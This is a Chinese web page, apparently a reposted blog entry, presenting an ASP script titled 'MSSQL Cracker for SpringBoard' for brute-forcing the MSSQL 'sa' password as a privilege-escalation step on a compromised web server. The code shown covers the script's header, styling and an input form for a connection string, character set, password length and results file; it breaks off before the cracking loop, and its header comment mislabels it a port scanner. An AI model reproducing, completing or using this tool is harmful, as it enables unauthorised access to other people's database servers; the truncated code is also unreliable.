linux认证:ASP提权暴力破解MSSQL用户密码

  linux认证:ASP提权暴力破解MSSQL用户密码, 一个暴力破解MSSQL用户密码的ASP程序,以下这个版本是可以运行之后关闭浏览器,运行完毕将在当前目录生成结果文件的。

 CODE:
    <%
    ‘============ ASP Port Scanner by lake2 ===================
    ‘http://lake2.0×54.org
    ‘Version: 0.1
    ‘For SpringBoard
    ‘==========================================================
    %>
    <style type=”text/css”>
    body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
    body {background-color: #ffffff;font-size:14px; }
    a:link {color: #0000FF;text-decoration: none;}
    a:visited {text-decoration: none;color: #0000FF;}
    a:hover {text-decoration: none;color: #FF0000;}
    a:active {text-decoration: none;color: #FF0000;}
    .buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
    .TextBox {border: 1px solid #084B8E}
    .styleRed {color: #FF0000}
    </style>
    <title>MSSQL Cracker for SpringBoard</title>
    <%
    Dim Password()
    If Request.Form(“go”) <> “1″ Then
    %>
    <div align=”center”>Welcome to <a href=”http://lake2.0×54.org” target=”_blank”>http://lake2.0×54.org</a> </div>
    <form name=”form1″ method=”post” action=”" onSubmit=”form1.Submit.disabled=true;”>
    ConnStr:
    <input name=”conn” type=”text” id=”conn” value=”Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};” size=”70″>
    <br>
    Char:
    <input name=”char” type=”text” id=”char” value=”0123456789″ size=”30″>
    <br>
    Length:
    <input name=”len” type=”text” id=”len” value=”3″ size=”4″>
    <br>
    Path:
    <input name=”path” type=”text” value=”<%=Server.MapPath(“r.txt”)%>” size=”50″>
    <input name=”CFile” type=”checkbox” id=”CFile” value=”1″ checked>
    Enablel<br>
    <input name=”go” type=”hidden” id=”go” value=”1″>
    <br>
    <input name=”Submit” type=”submit” id=”Submit” value=” Run “>
    </form>
    <%

你可能感兴趣的:(linux,暴力破解,linux认证,ASP提权,MSSQL用户密码)